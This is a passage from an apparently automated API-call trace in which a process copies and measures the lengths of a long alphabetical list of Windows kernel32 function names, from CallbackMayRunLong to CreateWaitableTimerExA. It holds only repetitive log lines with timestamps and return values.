lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.987] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.987] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.987] lstrlenA (lpString="CANCELIO") returned 8 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.987] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.987] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.987] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.987] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.987] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.987] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.987] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.988] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.988] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.988] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.988] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.988] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.988] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.988] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.988] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.988] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.988] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.988] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.988] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.988] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.988] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.988] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.988] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.988] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.988] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.988] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.989] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.989] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.989] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.989] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.989] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0181.989] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0181.989] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.989] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.989] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0181.989] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.989] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0181.989] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.989] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.989] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.989] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.989] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.989] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.989] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.990] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.990] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.990] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.990] lstrlenA (lpString="COPYFILEA") returned 9 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.990] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.990] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.990] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.990] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.990] lstrlenA (lpString="COPYFILEW") returned 9 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.990] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.990] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.990] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.990] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.990] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.990] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.990] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.990] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.990] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.990] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.990] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.991] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.991] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.991] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.991] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.991] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.991] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.991] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.991] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.991] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.991] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.991] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.991] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.991] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.991] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0181.991] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.991] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.991] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.991] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.991] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0181.991] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.992] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.992] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.992] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.992] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.992] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.992] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.992] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.992] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.992] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.992] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.992] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.992] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.992] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.992] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.992] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.992] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.992] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.992] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.993] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.993] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.993] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.993] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.993] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.993] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.993] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.993] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.993] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.993] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.993] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.993] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.993] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.993] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.993] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.993] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.993] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.993] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.994] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.994] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.994] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.994] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.994] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0181.994] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.994] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.994] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.994] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.994] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.994] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.994] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0181.994] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 